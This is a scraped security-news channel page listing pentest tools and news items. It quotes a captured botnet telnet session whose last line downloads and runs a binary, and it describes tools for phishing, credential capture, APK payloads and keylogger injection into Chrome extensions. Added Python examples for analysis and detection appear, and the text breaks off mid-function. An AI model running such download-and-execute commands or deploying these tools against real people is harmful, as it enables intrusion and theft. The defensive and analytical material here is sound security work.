Channel: HACK4NET 🤖 Pentest Tools and News

Telnet IoT Honeypot - Python Telnet Honeypot For Catching Botnet Binaries


This project implements a Python telnet server that acts as a honeypot for IoT malware, which spreads over horribly insecure default passwords on telnet servers on the internet.
Unlike https://github.com/stamparm/hontel or https://github.com/micheloosterhof/cowrie (as examples), which provide full (via chroot) or simulated behaviour of a Linux system, this honeypot's goal is just to collect statistics on (IoT) botnets. This means the honeypot must work with every form of automated telnet session that may try to infect it with malware. Luckily, these malware infection processes are quite simple: they just use wget to download something and then run it.


Architecture
The application has a client/server architecture, with a client (the actual honeypot) accepting telnet connections and a server aggregating connection data and sample analysis.
However, for local deployments, the application can also be run in local mode to eliminate the need to run a client and server locally.

Running
The application has a config file named config.py. Samples are included for local and client/server deployments.

Client/Local Mode
python honey.py

Server
python backend.py

Opening the frontend
After the server is started, open html/index.html in your favorite browser. For this to work, the url in html/apiurl.js should point to your running backend, which it should do automatically for local deployments.

Sample Connection
enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit
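Since the honeypot's purpose is statistics rather than emulation, the useful output of a session like the one above is a handful of indicators: the download URL and host, the files made executable and run, the architecture probe, and the busybox marker the bot echoes. The following is an added example of that extraction, written for this page and not part of the honeypot project; the session text is constructed from the sample connection above, and the field names are my own.

```python
"""Summarise an automated telnet session captured by the honeypot into indicators."""
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed session, modelled on the sample connection shown above (not a real capture)
SESSION = """enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit
"""

URL_RE = re.compile(r"(?:https?|ftp)://[^\s;|&'\"<>()]+")
MARKER_RE = re.compile(r"/bin/busybox\s+([A-Z0-9]{3,12})\b")
DEFAULT_PORTS = {"http": 80, "https": 443, "ftp": 21}


def split_commands(session):
    """Flatten the session into single commands: split on ';', '&&', '||' and '|'
    and drop the subshell parentheses the bots wrap their fallbacks in."""
    commands = []
    for line in session.splitlines():
        for part in re.split(r";|&&|\|\||\|", line):
            part = part.strip().strip("()").strip()
            if part:
                commands.append(part)
    return commands


def busybox_marker(session):
    """Bots run '/bin/busybox <TOKEN>' so that the unknown applet name is echoed back,
    which lets them locate their own output. The token doubles as a family marker."""
    counts = Counter(MARKER_RE.findall(session))
    return counts.most_common(1)[0][0] if counts else None


def summarise(session):
    """Return download URLs, (host, port) pairs, files made executable, files run,
    whether the bot probed the CPU architecture, and the busybox marker."""
    summary = {"urls": [], "hosts": [], "chmod": [], "executed": [],
               "arch_probe": False, "marker": busybox_marker(session)}
    for cmd in split_commands(session):
        argv = cmd.split()
        prog = argv[0].rsplit("/", 1)[-1]
        for url in URL_RE.findall(cmd):
            summary["urls"].append(url)
            u = urlsplit(url)
            summary["hosts"].append((u.hostname, u.port or DEFAULT_PORTS.get(u.scheme)))
        if prog == "chmod" and len(argv) >= 3:
            summary["chmod"].extend(argv[2:])
        elif prog == "dd" and any(a.startswith("if=") for a in argv):
            # 'cp /bin/echo .s; dd bs=52 count=1 if=.s' reads an ELF header (52 bytes for
            # ELF32) so the bot learns the victim's architecture before choosing a binary
            summary["arch_probe"] = True
        elif argv[0].startswith("./"):
            summary["executed"].append(argv[0][2:])
    return summary


if __name__ == "__main__":
    for key, value in summarise(SESSION).items():
        print(f"{key:>10}: {value}")
```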




Exitmap - A Fast and Modular Scanner for TOR Exit Relays


Exitmap is a fast and modular Python-based scanner for Tor exit relays. Exitmap modules implement tasks that are run over (a subset of) all exit relays. If you have a background in functional programming, think of exitmap as a map() interface for Tor exit relays: Modules can perform any TCP-based networking task like fetching a web page, uploading a file, connecting to an SSH server, or joining an IRC channel.



In practice, exitmap is useful to monitor the reliability and trustworthiness of exit relays. The Tor Project uses exitmap to check for false negatives on the Tor Project's check service and to find malicious exit relays. It is easy to develop new modules for exitmap; just have a look at the file HACKING in the doc/ directory or check out one of the existing modules.
Exitmap uses Stem to create circuits to all given exit relays. Each time tor notifies exitmap of an established circuit, a module is invoked for the newly established circuit. Modules can be pure Python scripts or executables. For executables, torsocks is necessary.
Finally, note that exitmap is a network measurement tool and of little use to ordinary Tor users. The Tor Project is already running the tool regularly. More exitmap scans just cause unnecessary network load. The only reason exitmap is publicly available is because its source code and design might be of interest to some.

Installation
Exitmap uses the library Stem to communicate with Tor. There are plenty of ways to install Stem. The easiest might be to use pip in combination with the provided requirements.txt file:
$ pip install -r requirements.txt

Running exitmap
The only argument exitmap requires is the name of a module. For example, you can run exitmap with the checktest module by running:
$ ./bin/exitmap checktest
The command line output will then show you how Tor bootstraps, the output of the checktest module, and a scan summary. If you don't need three hops and prefer to use two hops with a static first hop, run:
$ ./bin/exitmap --first-hop 1234567890ABCDEF1234567890ABCDEF12345678 checktest
To run the same test over German exit relays only, execute:
$ ./bin/exitmap --country DE --first-hop 1234567890ABCDEF1234567890ABCDEF12345678 checktest
If you want to pause for five seconds in between circuit creations to reduce the load on the Tor network and the scanning destination, run:
$ ./bin/exitmap --build-delay 5 checktest
Note that 1234567890ABCDEF1234567890ABCDEF12345678 is a pseudo fingerprint that you should replace with an exit relay that you control.
To learn more about all of exitmap's options, run:
$ ./bin/exitmap --help
Exitmap comes with batteries included, providing the following modules:
  • testfds: Tests if an exit relay is able to fetch the content of a simple web page. If an exit relay is unable to do that, it might not have enough file descriptors available.
  • checktest: Attempts to find false negatives in the Tor Project's check service.
  • dnspoison: Attempts to resolve several domains and compares the received DNS A records to the expected records.
  • dnssec: Detects exit relays whose resolver does not validate DNSSEC.
  • patchingCheck: Checks for file tampering.
  • cloudflared: Checks if a web site returns a CloudFlare CAPTCHA.
  • rtt: Measure round-trip times through an exit to various destinations.

Configuration
By default, exitmap tries to read the file .exitmaprc in your home directory. The file accepts all command line options, but you have to replace minuses with underscores. Here is an example:
[Defaults]
first_hop = 1234567890ABCDEF1234567890ABCDEF12345678
verbosity = debug
build_delay = 1
analysis_dir = /path/to/exitmap_scans

Alternatives
Don't like exitmap? Then have a look at tortunnel, SoaT, torscanner, DetecTor, or SelekTOR.

Tests
Before submitting pull requests, please make sure that all unit tests pass by running:
$ pip install -r requirements-dev.txt
$ py.test --cov-report term-missing --cov-config .coveragerc --cov=src test


Tweep - An Advanced Twitter Scraping Tool


Tweep is an advanced Twitter scraping tool written in Python that allows for scraping Tweets and pictures from Twitter profiles without using Twitter's API.

Benefits
Some of the benefits of using Tweep vs Twitter API:
  • Fast initial setup
  • Can be used anonymously
  • No rate limitations
  • Can fetch all Tweets (Twitter API limits to last 3200 Tweets)

Requirements
  • BeautifulSoup4 pip install beautifulsoup4

Usage
  • -u The user's Tweets you want to scrape.
  • -s Search for Tweets containing this word or phrase.
  • --year Filter tweets before the specified year.
  • --pics Download all the pictures from Tweets.
  • --fruit Display Tweets with "low-hanging-fruit".
  • --tweets Display Tweets only.
  • --verified Display Tweets only from verified users (Use with -s).
  • --users Display users only (Use with -s).

Low-Hanging Fruit
The --fruit feature will display Tweets that might contain sensitive info such as:
  • Profiles from leaked databases (Myspace or LastFM)
  • Email addresses
  • Phone numbers

Basic Examples and Combos.
A few simple examples to help you understand the basics:
  • python tweep.py -u username - Scrape all the Tweets from user's timeline.
  • python tweep.py -u username -s pineapple - Scrape all Tweets from the user's timeline containing pineapple.
  • python tweep.py -s pineapple - Collect every Tweet containing pineapple from everyone's Tweets.
  • python tweep.py -u username --year 2014 - Collect Tweets that were tweeted before 2014.
  • python tweep.py -u username --pics - Download all pictures from user's timeline.
  • python tweep.py -u username --fruit - Show Tweets with low-hanging fruit.
  • python tweep.py -s "Donald Trump" --verified --users - List verified users that Tweet about Donald Trump.

Example String
881653591265746945 2017-07-02 23:19:31 UTC <dqt> i need to drink more water


Evil-Droid - Framework to Create, Generate & Embed APK Payloads


Evil-Droid is a framework that creates, generates and embeds APK payloads to penetrate Android platforms.




Dependencies :
1 - metasploit-framework
2 - xterm
3 - Zenity
4 - Aapt
5 - Apktool
6 - Zipalign

Download/Config/Usage:
1 - Download the tool from GitHub:
git clone https://github.com/M4sc3r4n0/Evil-Droid.git
2 - Set the script execution permission:
cd Evil-Droid
chmod +x evil-droid
3 - Run the Evil-Droid framework:
./evil-droid
See the options below.



Built-in Keylogger Found in MantisTek GK2 Keyboards—Sends Data to China

"The right keyboard can make all the difference between a victory and a defeat in a video game battlefield."

If you are a gamer, you can relate to the above quote.

But what if your winning weapon betrays you?

The popular 104-key Mantistek GK2 Mechanical Gaming Keyboard, which costs around €49.66, has allegedly been caught silently recording everything you type on the keyboard and sending it to a server maintained by the Alibaba Group.

This built-in keylogger in Mantistek GK2 Mechanical Gaming Keyboard was noticed by a few owners who headed on to an online forum to share this issue.

According to Tom's Hardware, MantisTek keyboards use 'Cloud Driver' software, presumably to collect analytics, but it has been caught sending sensitive information to servers tied to Alibaba.

The affected users also provided a screenshot showing how all your plain-text keystrokes collected by the keyboard are being uploaded to a Chinese server located at IP address: 47.90.52.88.



However, since Alibaba Group, like Amazon and Google, also sells cloud services, the collected information is not necessarily being sent to Alibaba itself, but to someone who is using the company's service.

Opening the IP address in question directly in a web browser lands on a Chinese login page, which translates to "Cloud mouse platform background management system" and is maintained by Shenzhen Cytec Technology Co., Ltd.

Reportedly, the MantisTek keyboard's software sends the collected data to two destinations at that IP address:
  • /cms/json/putkeyusedata.php
  • /cms/json/putuserevent.php
The best way to prevent your keyboard from sending your keystrokes to the Alibaba server is to stop using your Mantistek GK2 Mechanical Gaming Keyboard until you hear back from the company about this issue.

If you cannot prevent yourself from using the keyboard, but want to stop it from sending your key presses to the Alibaba server, just make sure the MantisTek Cloud Driver software is not running in the background, and block the CMS.exe executable in your firewall.

To block the CMS.exe executable, add a new firewall rule for the MantisTek Cloud Driver in the "Windows Defender Firewall With Advanced Security."

written by Swati Khandelwal

Physicists are thinking that Quantum Particles can solve all the security Issues

Before long, researchers demonstrated the system in the lab, and today quantum cryptography is gaining commercially viable recognition through companies such as ID Quantique in Geneva, Switzerland.
But the whole scheme is a little counterintuitive. The private information is not sent using quantum particles at all. Instead, physicists use quantum means to send a key called a one-time pad, which is used to encrypt the actual message. The encrypted message is then sent over an ordinary telecommunications channel and decoded in the usual way. The method is called quantum key distribution.
Computer scientists know that a message encoded using a one-time pad cannot be broken. So the security comes from the ability to send the one-time pad with perfect privacy, which is what this approach guarantees.
And that raises an intriguing question. If it is possible to send the one-time pad securely using quantum particles, why not just send the actual message that way?
Today, Wei Zhang at Tsinghua University in Beijing and colleagues say they have done just this. The new method is called quantum secure direct communication, and the Chinese team has used it over 500 meters of fiber-optic cable for the first time.
The reason scientists have relied on one-time pads in the past is simple. At issue is whether a communication has been overheard. Physicists can check this because quantum bits cannot be measured without disturbing the information they contain.
So when photons are transmitted, if they arrive in the same state they were sent in, an eavesdropper cannot have extracted the data they contain. But if they arrive in a different state, that is clear evidence that the data has leaked into the environment and the message is not secure.
In practice, physicists can be sure that data is secure as long as this leakage is below a certain threshold.
The difficulty is that the leakage can only be detected after it has occurred. So an eavesdropper would already have the data by the time scientists found out about the interception.

source: latesthackingnews

wig - WebApp Information Gatherer

wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications.
The application fingerprinting is based on checksums and string matching of known files for different versions of CMSes. This results in a score being calculated for each detected CMS and its versions. Each detected CMS is displayed along with the most probable version(s) of it. The score calculation is based on weights and the amount of "hits" for a given checksum.
wig also tries to guess the operating system on the server based on the 'server' and 'x-powered-by' headers. A database containing known header values for different operating systems is included in wig, which allows wig to guess Microsoft Windows versions and Linux distribution and version.
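To make the scoring described above concrete, here is an added example (written for this page, not wig's own code or data) of checksum-based version scoring: each fetched file is hashed, matched against a small constructed fingerprint table, and every version that ships that exact file is credited with the entry's weight divided by the number of versions sharing it, so the version with the most specific hits wins. The fingerprint entries, regexes and site bodies are all constructed stand-ins.

```python
"""Fingerprint scoring in the style wig describes: hash fetched files, weigh hits per version."""
import hashlib
import re
from collections import defaultdict


def md5(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


# Constructed fingerprint database (a stand-in for wig's data files, not its real content).
# Each entry: (path, md5 of the known file, versions that ship exactly that file, weight).
# A file unique to one version is strong evidence (high weight); a file shared by many
# versions is weak evidence (low weight).
FINGERPRINT_DB = [
    ("/CHANGELOG.txt", md5(b"Drupal 7.38, 2015-06-17"), ["7.38"], 2.0),
    ("/CHANGELOG.txt", md5(b"Drupal 7.37, 2015-05-07"), ["7.37"], 2.0),
    ("/misc/drupal.js", md5(b"drupal.js build A"), ["7.37", "7.38"], 1.0),
    ("/misc/drupal.js", md5(b"drupal.js build B"), ["7.34", "7.35", "7.36"], 1.0),
    ("/misc/ajax.js", md5(b"ajax.js unchanged since 7.34"),
     ["7.34", "7.35", "7.36", "7.37", "7.38"], 0.5),
]

# Constructed string fingerprints: a regex over a page body names the CMS (no version).
STRING_DB = [
    (re.compile(rb'<meta name="generator" content="Drupal \d+'), "Drupal"),
]


def detect_cms(fetched, string_db=STRING_DB):
    """fetched: {path: body bytes}. Returns the set of CMS names hit by string fingerprints."""
    return {name for body in fetched.values() for rx, name in string_db if rx.search(body)}


def score_versions(fetched, db=FINGERPRINT_DB):
    """Return {version: (score, hits)} for every version with at least one checksum hit.

    Each hit adds weight / len(versions): a file shipped by N versions can only vouch
    for each of them with 1/N of its weight."""
    scores = defaultdict(float)
    hits = defaultdict(int)
    for path, body in fetched.items():
        digest = md5(body)
        for db_path, db_md5, versions, weight in db:
            if db_path == path and db_md5 == digest:
                for v in versions:
                    scores[v] += weight / len(versions)
                    hits[v] += 1
    return {v: (round(scores[v], 3), hits[v]) for v in scores}


def most_probable(scores):
    """Versions sharing the top score; several come back when the evidence cannot separate them."""
    if not scores:
        return []
    best = max(s for s, _ in scores.values())
    return sorted(v for v, (s, _) in scores.items() if s == best)


# Constructed responses, as if fetched from a target (no network access needed).
SITE = {
    "/": b'<html><head><meta name="generator" content="Drupal 7 (http://drupal.org)"></head></html>',
    "/CHANGELOG.txt": b"Drupal 7.38, 2015-06-17",
    "/misc/drupal.js": b"drupal.js build A",
    "/misc/ajax.js": b"ajax.js unchanged since 7.34",
    "/robots.txt": b"User-agent: *",   # no fingerprint for this file: contributes nothing
}

# A site that hides its changelog: only the shared file matches, so five versions tie.
SITE_NO_CHANGELOG = {"/misc/ajax.js": b"ajax.js unchanged since 7.34"}

if __name__ == "__main__":
    print("CMS:", detect_cms(SITE))
    s = score_versions(SITE)
    print("scores:", s)
    print("most probable:", most_probable(s))
    print("tie without changelog:", most_probable(score_versions(SITE_NO_CHANGELOG)))
```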



Requirements
wig is built with Python 3, and is therefore not compatible with Python 2.

Installation
wig can be run from the command line or installed with distutils.

Command line
$ python3 wig.py example.com

Usage in script
Install with
$ python3 setup.py install
and then wig can be imported from any location as such:
>>> from wig.wig import wig
>>> w = wig(url='example.com')
>>> w.run()
>>> results = w.get_results()

How it works
The default behavior of wig is to identify a CMS, and exit after version detection of the CMS. This is done to limit the amount of traffic sent to the target server. This behavior can be overwritten by setting the '-a' flag, in which case wig will test all the known fingerprints. As some configurations of applications do not use the default location for files and resources, it is possible to have wig fetch all the static resources it encounters during its scan. This is done with the '-c' option. The '-m' option tests all fingerprints against all fetched URLs, which is helpful if the default location has been changed.

Help Screen
usage: wig.py [-h] [-l INPUT_FILE] [-q] [-n STOP_AFTER] [-a] [-m] [-u] [-d]
[-t THREADS] [--no_cache_load] [--no_cache_save] [-N]
[--verbosity] [--proxy PROXY] [-w OUTPUT_FILE]
[url]

WebApp Information Gatherer

positional arguments:
url The url to scan e.g. http://example.com

optional arguments:
-h, --help show this help message and exit
-l INPUT_FILE File with urls, one per line.
-q Set wig to not prompt for user input during run
-n STOP_AFTER Stop after this amount of CMSs have been detected. Default: 1
-a Do not stop after the first CMS is detected
-m Try harder to find a match without making more requests
-u User-agent to use in the requests
-d Disable the search for subdomains
-t THREADS Number of threads to use
--no_cache_load Do not load cached responses
--no_cache_save Do not save the cache for later use
-N Shortcut for --no_cache_load and --no_cache_save
--verbosity, -v Increase verbosity. Use multiple times for more info
--proxy PROXY Tunnel through a proxy (format: localhost:8080)
-w OUTPUT_FILE File to dump results into (JSON)

Example of run:
$ python3 wig.py example.com

wig - WebApp Information Gatherer


Redirected to http://www.example.com
Continue? [Y|n]:
Scanning http://www.example.com...
_____________________________________________________ SITE INFO _____________________________________________________
IP Title
256.256.256.256 PAGE_TITLE

______________________________________________________ VERSION ______________________________________________________
Name Versions Type
Drupal 7.38 CMS
nginx Platform
amazons3 Platform
Varnish Platform
IIS 7.5 Platform
ASP.NET 4.0.30319 Platform
jQuery 1.4.4 JavaScript
Microsoft Windows Server 2008 R2 OS

_____________________________________________________ SUBDOMAINS ____________________________________________________
Name Page Title IP
http://m.example.com:80 Mobile Page 256.256.256.257
https://m.example.com:443 Secure Mobil Page 256.256.256.258

____________________________________________________ INTERESTING ____________________________________________________
URL Note Type
/test/ Test directory Interesting
/login/ Login Page Interesting

_______________________________________________ PLATFORM OBSERVATIONS _______________________________________________
Platform URL Type
ASP.NET 2.0.50727 /old.aspx Observation
ASP.NET 4.0.30319 /login/ Observation
IIS 6.0 http://www.example.com/templates/file.css Observation
IIS 7.0 https://www.example.com/login/ Observation
IIS 7.5 http://www.example.com Observation

_______________________________________________________ TOOLS _______________________________________________________
Name Link Software
droopescan https://github.com/droope/droopescan Drupal
CMSmap https://github.com/Dionach/CMSmap Drupal

__________________________________________________ VULNERABILITIES __________________________________________________
Affected #Vulns Link
Drupal 7.38 5 http://cvedetails.com/version/185744

_____________________________________________________________________________________________________________________
Time: 11.3 sec Urls: 310 Fingerprints: 37580


Trape - People tracker on the Internet (The evolution of phishing attacks) OSINT


Trape is a reconnaissance tool that lets you track people, and the information you can obtain is very detailed. We want to use it to teach the world how large Internet companies could monitor you, obtaining information beyond your IP.



Some benefits
  • One of its most enticing functions is the remote recognition of sessions. You can know where a person has logged in, remotely. This occurs through a Bypass made to the Same Origin Policy (SOP)
  • Currently you can try everything from a web interface. (The console, becomes a preview of the logs and actions)
  • Registration of victims, requests among other data are obtained in real time.
  • If you get more information from a person behind a computer, you can generate a more direct and sophisticated attack. Trape was used at some point to track down criminals and know their behavior.
  • You can do real time phishing attacks
  • Simple hooking attacks
  • Mapping
  • Important details of the objective
  • Capturing credentials
  • Open Source Intelligence (OSINT)

Recognizes the sessions of the following services
  • Facebook
  • Twitter
  • VK
  • Reddit
  • Gmail
  • tumblr
  • Instagram
  • Github
  • Bitbucket
  • Dropbox
  • Spotify
  • PayPal
  • Amazon

How to use it
First download the tool.
git clone https://github.com/boxug/trape.git
cd trape
python trape.py -h
If it does not work, try to install all the libraries that are located in the file requirements.txt
pip install -r requirements.txt
Example of execution
Example: python trape.py --url http://example.com --port 8080
  • In the --url option you must put the lure: a news page, an article, anything that serves as a presentation page.
  • In the --port option you put the port where you want it to run.
  • Do you want to monitor your people? Everything is possible with Trape.
  • Do you want to perform phishing attacks? Everything is possible with Trape.
  • In the Files directory, located at /static/files, you add the files with .exe extension or the download files sent to the victim.

Here are some simple videos to use:
Spanish: https://www.youtube.com/watch?v=ptyuCQmMKiQ
English: https://www.youtube.com/watch?v=FdwyIZhUx3Y
At an international security event in Colombia, called DragonJAR Security Conference 2017, a demonstration was made before the launch. You can watch the video here: https://www.youtube.com/watch?v=vStSEsznxgE

Disclaimer
This tool has been published for educational purposes, in order to teach people how bad guys could track or monitor them or obtain information from their credentials; we are not responsible for the use or the scope that people may give this project.
We are totally convinced that if we teach how vulnerable things are, we can make the Internet a safer place.

Developers or participants
The following people are part of the core development and research team at Boxug.
For this and other developments, the participants are listed with name, Twitter handle and role.



Kernelpop - Kernel Privilege Escalation Enumeration And Exploitation Framework


kernelpop is a framework for performing automated kernel exploit enumeration on Linux, Mac, and Windows hosts.

Requirements
python3

Currently supported CVEs:
  • CVE-2017-1000367
  • CVE-2017-1000112
  • CVE-2017-7308
  • CVE-2017-6074
  • CVE-2017-5123
  • CVE-2016-5195
  • CVE-2016-2384
  • CVE-2016-0728
  • CVE-2015-7547
  • CVE-2015-1328
  • CVE-2014-4699
  • CVE-2014-4014
  • CVE-2014-3153
  • CVE-2014-0196
  • CVE-2009-1185

Run modes

default mode
The default mode runs with the command python3 kernelpop.py. This processes information about the host kernel and compares it to the known kernel exploits available to the program. It then outputs a list of potentially useful vulnerabilities and attached exploits.


brute-enumeration mode
The brute-enumeration mode performs the same checks, but then goes beyond and checks the computer for exploit prerequisites to see if the operating system is set up in the required vulnerable state for successful exploitation.



input mode
The input mode allows you to perform enumeration with just the output of a uname -a command, which makes it useful as a host-side enumeration tool.



One feature currently only partially implemented is brute-exploit mode. This is set to prepare, compile, and run exploits in order to confirm an exploitable kernel. However, as of now it would only run on the box the program is executed on. Given that this is a fairly large project to bring on to someone else's computer, and makes considerable noise when compiling and checking exploit attempts, it would be poor OPSEC to use in an actual engagement. At some point in the future, I would like to integrate it into my other project pysploit for enumeration and the reckless, noisy, exploity brute-exploit mode.

Exploit sources
https://github.com/SecWiki/linux-kernel-exploits
https://www.exploit-db.com/local/
https://github.com/SecWiki/windows-kernel-exploits


Striker - Offensive Information And Vulnerability Scanner


Striker is an offensive information and vulnerability scanner.

Features
Just supply a domain name to Striker and it will automatically do the following for you:
  • Check and Bypass Cloudflare
  • Retrieve Server and Powered by Headers
  • Fingerprint the operating system of Web Server
  • Detect CMS (197+ CMSs are supported)
  • Launch WPScan if target is using Wordpress
  • Retrieve robots.txt
  • Check if the target is a honeypot
  • Port Scan with banner grabbing
  • Dumps all kind of DNS records
  • Generate a map for visualizing the attack surface
  • Gather Emails related to the target
  • Find websites hosted on the same web server
  • Find hosts using google
  • Crawl the website for URLs having parameters
  • SQLi scan using an online implementation of SQLMap (takes < 3 min.)
  • Basic XSS scanning









Oh, Crap! Someone Accidentally Triggered A Flaw That Locked Up $280 Million In Ethereum


Horrible news for some Ethereum users.

About $300 million worth of Ether—the cryptocurrency unit that has become one of the most popular and increasingly valuable cryptocurrencies—from dozens of Ethereum wallets was permanently locked up today.

Smart contract coding startup Parity Technologies, which is behind the popular Ethereum Parity Wallet, announced earlier today that its "multisignature" wallets created after July 20 this year contain a severe vulnerability that makes it impossible for users to move their funds out of those wallets.

According to Parity, the vulnerability was triggered by a regular GitHub user, "devops199," who allegedly and accidentally removed critical library code from the source code, which turned all multi-sig contracts into a regular wallet address and made the user its owner.

Devops199 then killed this wallet contract, making all Parity multisignature wallets tied to that contract instantly useless and leaving their funds locked away with no way to access them.
"These (https://pastebin.com/ejakDR1f) multi_sig wallets deployed using Parity were using the library located at "0x863df6bfa4469f3ead0be8f9f2aae51c91a907b4" address," devops199 wrote on GitHub.
"I made myself the owner of '0x863df6bfa4469f3ead0be8f9f2aae51c91a907b4' contract and killed it and now when I query the dependent contracts 'isowner(<any_addr>)' they all return TRUE because the delegate call made to a died contract."

Parity multisignature wallets also experienced a vulnerability in July this year that allowed an unknown hacker to steal nearly $32 million in funds (approximately 153,000 units of Ether) before the Ethereum community secured the rest of its vulnerable Ether.

According to Parity, a new version of the Parity Wallet library contract deployed on 20th of July contained a fix to address the previously exploited multi-sig flaw, but the code "still contained another issue," which made it possible to turn the Parity Wallet library contract into a regular wallet.

The vulnerability affected Parity multi-sig wallets that were deployed after July 20—meaning ICOs (Initial Coin Offerings) that were held since then may be impacted.

So far, it is unclear exactly how much cryptocurrency has disappeared due to this blunder, but some cryptocurrency blogs have reported that Parity wallets constitute roughly 20% of the entire Ethereum network.

This has led researchers familiar with the space to estimate that around $280 million worth of Ether is now inaccessible, including $90 million raised by Parity's founder Gavin Wood.

Parity froze all affected multi-sig wallets (that is millions of dollars' worth of Ethereum-based assets) as its team scrambles to bolster security. The team also promised to release an update with further details shortly.

Cromos - Download and Inject code into Google Chrome extensions


Cromos is a tool for downloading legitimate extensions from the Chrome Web Store and injecting code into the extension's background page. Cromos can also create executable files that force installation via PowerShell, for example, and upload files to Dropbox to host the malicious files.
  • Download extension
  • Injections
  • Upload files on dropbox
  • Windows infection



Group Policy Object (GPO)
Chrome allows you to add extensions using a Windows Group Policy Object (GPO). If you need to force installation on multiple machines, just follow the steps in the Chrome Deployment Guide, then modify the original extension. With a few modifications you can publish your extension in the Chrome Web Store, which requires a $5 fee.

Support
If you choose to generate a batch file to force installation, the PowerShell script that will be downloaded is compatible with Windows 7, 8 and 10 with PowerShell versions >= 3.0.

Demo
This is a demonstration of the tool at work. In this example I'm downloading a famous Google extension called G Suite Training from the Chrome Web Store and injecting a keylogger module.

Installation
$ cd $HOME/
$ git clone https://github.com/fbctf/cromos
$ sudo chmod -R 777 cromos/
$ cd cromos && python setup.py

Usage

Downloading the extension
Usage: python cromos.py --extension {id}

Downloading the extension and loading module
Usage: python cromos.py --extension {id} --load {currency/keylogger}

Build a batch file and upload the files in dropbox
Usage: python cromos.py --extension {id} --build {bat} --token {dropboxToken}

Modules
You can also inject some predefined modules in the background, such as a keylogger or virtual currency mining.
Module: Description
modules/keylogger: This module captures all the passwords you type in an infected browser, over HTTPS or not. All you need is, for example, a PHP server to receive the GET requests; the parameters are email, password, cookies and userAgent.
modules/currency: This module allows you to mine virtual coins using the Coinhive API; you just need to have an account.


KRACK Detector - Detect and prevent KRACK attacks in your network


KRACK Detector is a Python script to detect possible KRACK attacks against client devices on your network. The script is meant to be run on the Access Point rather than the client devices. It listens on the Wi-Fi interface and waits for duplicate message 3 of the 4-way handshake. It then disconnects the suspected device, preventing it from sending any further sensitive data to the Access Point.
KRACK Detector currently supports Linux Access Points with hostapd. It uses Python 2 for compatibility with older operating systems. No external Python packages are required.




Usage
Run as root and pass the Wi-Fi interface as a single argument. It is important to use the actual Wi-Fi interface and not any bridge interface it connects to.
python krack_detect.py wlan0
If you do not wish to disconnect suspected devices, use the -n flag
python krack_detect.py -n wlan0

Known Issues
Message 3 of the 4-way handshake might be retransmitted even if no attack is performed. In such a case the client device will be disconnected from the Wi-Fi network. Some client devices take some time to re-authenticate, losing the Wi-Fi connection for a few seconds.
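The detection rule described above (a second message 3 to the same client before message 4 closes the handshake) and the retransmission caveat in Known Issues, as an added example that is not the KRACK Detector script itself: it parses raw EAPOL-Key frames, classifies them as handshake message 1 to 4 from the Key Information flags, and keeps a per-client counter. The frames and MAC addresses are constructed for the test, the max_msg3 knob is my own addition, and the example only reports the client instead of deauthenticating it.

```python
"""Detect a duplicate message 3 of the WPA2 4-way handshake from raw EAPOL-Key frames."""
import os
import struct

# EAPOL-Key "Key Information" flag bits (IEEE 802.11 key descriptor)
KEY_TYPE_PAIRWISE = 0x0008
KEY_INSTALL = 0x0040
KEY_ACK = 0x0080
KEY_MIC = 0x0100
KEY_SECURE = 0x0200

EAPOL_TYPE_KEY = 3
EAPOL_KEY_MIN_LEN = 4 + 95   # EAPOL header + fixed EAPOL-Key descriptor fields


def parse_eapol_key(frame):
    """Return (key_info, replay_counter, nonce) or None if this is not an EAPOL-Key frame."""
    if len(frame) < EAPOL_KEY_MIN_LEN or frame[1] != EAPOL_TYPE_KEY:
        return None
    _desc, key_info, _key_len, replay = struct.unpack(">BHHQ", frame[4:17])
    return key_info, replay, frame[17:49]


def handshake_message(key_info):
    """Classify a frame as message 1..4 of the 4-way handshake, or 0 (group key etc.)."""
    if not key_info & KEY_TYPE_PAIRWISE:
        return 0
    ack, mic, install, secure = (bool(key_info & b) for b in (KEY_ACK, KEY_MIC, KEY_INSTALL, KEY_SECURE))
    if ack and not mic:
        return 1
    if ack and mic and install:
        return 3
    if mic and not ack and not install:
        return 4 if secure else 2
    return 0


class KrackDetector:
    """Track each client's open handshake and report when message 3 shows up more than allowed.

    max_msg3=1 mirrors the page's script: any second message 3 is suspect. A benign
    retransmission (see Known Issues) looks identical on the AP, so raising max_msg3
    trades those false positives for missed attacks."""

    def __init__(self, max_msg3=1):
        self.max_msg3 = max_msg3
        self.msg3_seen = {}   # client MAC -> number of message 3 frames in the open handshake

    def feed(self, src, dst, frame):
        """Process one frame (src/dst MACs as strings). Returns the suspect client MAC or None."""
        parsed = parse_eapol_key(frame)
        if parsed is None:
            return None
        msg = handshake_message(parsed[0])
        if msg == 1:                       # AP starts a fresh handshake: reset the counter
            self.msg3_seen[dst] = 0
        elif msg == 3:                     # AP -> client: the key-install message
            self.msg3_seen[dst] = self.msg3_seen.get(dst, 0) + 1
            if self.msg3_seen[dst] > self.max_msg3:
                return dst                 # the page's script disconnects this client here
        elif msg == 4:                     # client confirmed installation: handshake complete
            self.msg3_seen.pop(src, None)
        return None


def build_eapol_key(key_info, replay_counter, nonce=None):
    """Construct a minimal EAPOL-Key frame (zeroed MIC/IV/RSC, no key data) for testing."""
    nonce = nonce or os.urandom(32)
    body = (struct.pack(">BHHQ", 2, key_info, 16, replay_counter) + nonce
            + bytes(16 + 8 + 8 + 16) + struct.pack(">H", 0))
    return struct.pack(">BBH", 2, EAPOL_TYPE_KEY, len(body)) + body


AP, STA = "aa:bb:cc:dd:ee:01", "00:11:22:33:44:55"   # constructed addresses
MSG1 = KEY_TYPE_PAIRWISE | KEY_ACK
MSG2 = KEY_TYPE_PAIRWISE | KEY_MIC
MSG3 = KEY_TYPE_PAIRWISE | KEY_ACK | KEY_MIC | KEY_INSTALL | KEY_SECURE
MSG4 = KEY_TYPE_PAIRWISE | KEY_MIC | KEY_SECURE


def run_scenario(retransmit_msg3, max_msg3=1):
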